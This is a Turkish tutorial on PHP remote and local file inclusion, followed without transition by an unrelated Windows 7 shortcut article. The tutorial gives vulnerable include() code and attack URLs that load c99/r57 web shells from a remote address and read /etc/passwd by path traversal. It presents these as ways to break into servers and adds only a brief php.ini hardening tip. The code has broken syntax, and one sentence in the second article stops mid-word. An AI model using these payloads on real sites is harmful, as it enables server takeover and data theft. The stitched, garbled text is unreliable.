Serdar Demir

Remote File inclusion: uzaktan dosya dahil etme.

Local File inclusion: yerel(serverdan) dosya dahil etme.

Remote File Inclusion: Öncelikle bu file inclusion açıgımızdan bahsetmeye başla-yalım.Dediğim gibi son zamanların en çok kullanılan ve bulunan açıklarından.

Bu açıklar sayesinde hedef siteye php shell’ler(c99,r57) upload edilebilir, hatta serverdaki tüm sitelere zarar verilebilir.Peki bu açıklar nasıl meydana gelirler birazdan ondan bahsedelim.

Php scriptlerini kodlayan coderlerın hepsi profesyonel değillerdir, yada binlerce satır yazılan kodlarda yapılan hatalardan ortaya çıkar bu File Include açıkları.Bir örnekle açıklamadan önce bazı 3-5 bilgi örenmeniz gerekmektedir.

Veriable: veriabler, php dilinde bilgileri bulunduran sepetler olarak düşebilirsiniz.

İnclude ve include_once: Kelime anlamı dahil etmedir.php dilinde bir dosya ya, başka bir dosyayı dahil etmeye yarar.Binlerce satır kodu tek bir kod la başka bir sayfada kodlanmış olarka gösterebilirsiniz.

Require ve require_once: Görevi bir üstteki include ve include_once ile aynıdır ama tek bir farkı vardır.O farkta; bir scriptte include ile bir dosyayı başka bir dosyaya dahil ettik, ama o dahil ettiğimiz dosya mevcut değil.Bu durumda o satırı php yorumlayıcısı atlar, hata mesajı gösterir ve o sayfanın kalan kodlarını yorumlar.Ama require de bu durum yoktur.require ile dahil edilen dosya mevcut değilse, bu sefer tek bir hata kodu gösterir php yorumlayıcısı ve sayfadaki diğer kodları okumayı durdurur.Bu fark bizim için önemsizdir, ama bilmenizde fayda var:)

Şimdi bir örnek yapalım..

include ($xoron.’../config.php’) ;
?>

Üstteki kodun bulundugu dosyayı test.php olarak kaydedin ve bir php destekleyen siteye atın.test.php yi açtıgınızda bir hata alacaksınızdır.Bunun nedeni test.php ye dahil edilen config.php nin bulunamamasıdır:)

www.mysite.com/test.php?xoron=http://shell-adresiniz?

Test.php de bulunun $xoron veriableı tanımlı değildir.Yani sepet dolu değildir.Bizde o boş sepeti kendi kodumuzda yani c99 veya r57 shell’lerimizle doldurarak servera girebiliriz.

$xoron: ‘files’;
include ($xoron.’../config.php’) ;
?>

Üstteki kodu test2.php olarak kaydedin ve php destekleyen sitenize atınız.

www.mysite.com/test.php?xoron=http://shell-adresiniz?

Yazarsanız açıgın çalışmadıgını göreceksinizdir.Bunun nedeni  $xoron: ‘files’;

Bu kod ile $xoron veriablenın tanımlanması yani sepetin doldurulmasıdır.

Local File Inclusion: RFI açıgından bahsettikten sonra ise sıra geldi LFI açıklarına.Bu açıklar RFI dan daha az kullanılmaktadır ve etkiside RFI kadar yoktur.Biraz hakkında konuşalım LFI’nın:). Gene php coderların acemilikleri veya unutkanlıklarından meydana gelen açıklardır.LFI ile bir sitenin ftp’sindeki veya serverdaki dosyaları okuma iznimiz varsa okuyabiliriz.Her RFI açıgını bir LFI gibi kullanabiliriz ama ortada bir remote file include imkanımız varken local file include yapmamız saçma olurdu=) .

Bir örnekle açıklayalım;)

include (’files/$cw/config.php’) ;
?>

Bu kodu test3.php olarak save edip php destekleyen bir servera atıp çalıştırdıgımızda gene hata alacagızdır,bunun neden, config.php nin bulunamamasıdır.Bu bizim için fark etmez bizim amacımız farklı.

Bu koddaki $cw veriablı tanımlı değildir bu yüzden aşagıdaki bir komutla okuma izni olan tüm dosyaları okuyabiliriz.

www.mysite.com/test3.php?cw=../../../../etc/passwd

ben üstte serverın /etc/passwd dosyasını okudum siz isterseniz başka dosyalarıda okuyabilirsiniz.

$cw : ‘conf’ ;
include (’files/$cw/config.php’) ;
?>

Bu dosyayı test4.php olarka save edip php destekleyen bir hostta attıgınızda LFI açıgının çalışmadıgını göreceksiniz.Bunun nedeni  $cw : ‘conf’ ; bu kod ile tanımlı olmayan $cw veriablı tanımlanmıştır.Yani sepet doldurulmuştur.

Son zamanların en çok kullanılan ve hostingcilerin başına en çok bela açan açıkların başında gelmektedir.

File Inclusion açıklarından yararlanarak servera upload edilen php shell’lerden nasıl korunurum diye düşünüyorsanız işte cevabı….

/etc/php.ini dosyasını açın

disable_function satırını buluyoruz ve karşısına bunları ekliyoruz.

system,passthru,exec,popen,proc_close,proc_get_sta tus,proc_nice,proc_open,
allow_url_fopen,shell,shellexec,execute

service htttpd restart diyoruz

NOT: Bu fonksiyonlar disable yapıldıgında bazı scriptler serverınızda çalışmayacaktır ama bu açıklardan da korumuş olacaksınız.

Ancak yenilik demek aynı zamanda alışkanlıkları da değiştirmek demek. Her gün rutin işleri için bilgisayar kullanan insanlar bu değişime çok hızlı ayak uyduramıyorlar.

Windows 7 kısa yollar konusunda çok başarılı

Ama merak etmeyin Shiftdelete.net olarak bu yeni sisteme alışmanızda size yardımcı olacağız. Windows 7 kısa yollar konusunda kullanıcılara en kolaylık sunan işletim sistemi. Bu yüzden alışılagelir, kısa yol tuşlarına yenileri de eklendi. Artık, yeni klasör açmaktan, tüm açık sayfaları arka plana atmaya hatta projektör cihazlarıyla bile bağlantı sağlamayı kısa yollarla yapabileceksiniz. İşte 22 Ekim‘de çıkacak olan Windows 7‘de bilmeniz gereken k ısa yollar.

Eskiden sadece, fare kullanmayı üşenen kullanıcıları sevinden bu tuş Vistaile birlikte daha önemli bir hal almıştı. Windows 7, Windows tuşunu çok daha işlevli hale getiriyor. Hemen hemen her kısa yolda artık onu kullanmak zorundayız. Bu rehberdeki ilk ve en basit kısa yolumuzWindows tuşuna bakmak, bize sağladığı fayda ise Başlangıç menüsünü açması.

Eski dost artık daha işlevli

Böylece Vista ile birlikte eklenen, Aramaya Başla özelliğine girebiliyoruz. Belki yeni bir kısa yol değil ama kesinlikle daha gelişmiş. Buraya yazdığınız programı, artık direk çalıştırabiliyorsunuz. Bu kısa yol fareyi daha da önemsiz hale getiriyor. Tek eliyle klavye kullanmak isteyenler için çok etkili bir çözüm.

Yoğun iş temposu sırasında bir sayfadan diğerini geçmek için fareylesimgelere tıklamak bazen çok sinir bozucu olabiliyor. Bir de tek elinizlebaşka iş yapmanız gerekiyorsa bu durum daha da rahatsız edici bir hal alıyor.

Minimize içinde bir kısayol var

Windows + Home kısa yolu sayesinde ekranda bulunan hemen her pencerenin simge durumunu ufaltabiliyorsunuz. Orijinal dili minimize olan bu özelliği eskiden beri tanıyoruz ancak şimdi yapması daha kolay. Tabi, ani patron baskınlarında ekrandan kurtulmak içinde kullanılabilir.

Oyun oynarken, film izlerken ya da bir programla uğraşırken mutlakamasaüstünüzde yapmamız gereken bir şeyler olur. Programı kapatmadan masaüstüne dönmek için Alt +Tab tuşlarını kullanıyorduk. Ancak bu her zaman işe yaramadığı gibi bir de programların çökmesine ya da bilgisayarın yavaşlamasına neden oluyordu.

Ekranda bir sorun yok bu da Windows 7′nin bir özelliği

Win + Space tuşu bu sorunu çözüyor. Bu kısa yolu kullandığımız zaman tuşlara basılı tutuğumuz süre kadar masa üstünü ilginç bir animasyonlabirlikte görebiliyoruz. Orada yapmamız gereken bir iş varsa bunu da hallediyoruz. Bu sistem yine ani patron baskınlarına karşı kalkan görevi de görüyor.

Herkesin sürekli kullandığı programlar vardır. Onlar için bu programlar o kadar rutin ki, hergün açmak için onları ayarlamak tam bir külfet. Windows 7‘nin sunduğu yeni bir özellik bu sorunu da çözüyor. Windows + 1-9arasındaki bir tuşa basarsak, bizim atadığımız ya da işletim sistemininkendisinin yerleştirdiği bir programı hemen açabiliyoruz.

Artık tek tuşla program ya da klösörler açılabiliyor

Aynı şekilde sayfalar ya da klasörler de bu tuşlar arasında açılabiliyor. Aslında sistem daha önce Online Oyunlarda kullanılıyordu. Kullanıcılar dövüşler sırasında daha çabuk olmak için bu tarz kısa yollara yaratıp benzer yollardan çalıştırıyordu.

Bu yenilik özellikle grafikerlerin ya da aynı anda birkaç pencereyleçalışanların işine yarayacak. İş yaparken, birkaç sayfa açmak için onlarıMouse ile tutup istenilen ufaklığa getirmek gerekiyordu. Kısacası bir kutuyu alıp onu fare yardımıyla daraltıyorduk. Microsoft‘un yeni işletim sistemi bu uğraştıran işe bir son vermiş. Özellikle widescreen yada büyük ekran bir monitörünüz varsa bu yenilik daha hoşunuza gidecek.

Pencereleri ufaltıp ekranın köşesine koymak çok daha hızlı

Önünüzde bir pencere varken, Windows ve klavyedeki sağ ya da sol tuşlarından birine basın. Seçtiğiniz yöne göre sistem pencereyi otomatik olarak o tarafa yapıştıracak. Böylece birden çok pencereyle çalışmak içinsadece iki kez kısa yol kullanacaksınız. Bu zamandan büyük bir tasarruf sağlıyor. Tekrar bu tuşlara bastığınız zaman açık olan pencere, ekranda ufak olarak çeşitli yerlerde gezecek. İstediğiniz yerde bırakıp işlerinizedevam edebilirsiniz.

Şimdi tanıtacağımız kısa yol, programcıların ya da arşivcilerin işini daha çok kolaylaştıracak. Nedeni ise, Windows 7‘nin yeni bir klasör açmayı da kısa yol ile hallediyor olması. Programcılar gibi kısa sürede onlarca yeni klasör açmak zorunda kalanlar farenin tıklama zulmünden kurtuluyor. Masaüstündeyken ya da bir klasör içindeyken Ctrl+Shift+N tuşlarına basarsanız bu özelliği aktif ediyorsunuz.

Dağınık şekilde duran dosyalarınızı kısa yolların yardımıyla toparlayın

Ne kadar çok basarsanız o kadar yeni klasör açılıyor. Kısacası tıpkı virüsler gibi bir kaç dakikada onlarca yeni klasör açıyor. Ancak hala o klasörlere tek tek isim yazma derdi var. Kimbilir belki ileriki sürümlerdeMicrosoft bu iş içinde bir kısa yol yaratır. Belki diğer özellikler kadar fayd

Hemen herkes bir şeyler okumak için Windows‘un büyüteç eklentisini kullanmıştır. Bu özelliği aktif etmek için eskiden başlat menüsünde bayağı bir dolaşmamız gerekiyordu. Birkaç saniyelik bir kullanım için bir dakikaya yakın zaman harcıyorduk. Microsoft en sonunda bir kısa yol geliştirip bu eziyetten kullanıcılarını kurtardı. 

Windows 7‘de çalışan programların çoğunda Windows ve + tuşlarına aynı anda basarsanız büyüteç eklentisi hemen aktif olacaktır. Böylece hem vaktinizden olmayacaksınız, hem de tembellikten gözlerinizi bozmayacaksınız. Yaşlı ve gözleriyle sorun yaşayanlar da en az tembel kullanıcılar kadar bu işe sevinecek.

Windows 7 projektörlerle ilginç bir uyumluluğa sahip. Konferansverecekler ya da film izleyecekler bu iş birliğini çok sevecekler. İşletim sisteminde bulunan bir kısa yol projektör ve bilgisayara bağlı diğer cihazlara görüntü yollamak için özel bir ekran çalıştırıyor.

Konferans verenler bu yenilikle rahatlayacaklar

Windows tuşu ve P’ye aynı anda basarsanız bağlantılar menüsüne geçiyorsunuz. Buradan, projektöre tek bilgisayara bağlı iki monitöre ya da televizyona görüntü yollanabiliyor. Firma ek programlarla halledilen bu özelliği de kendi tekeline almış.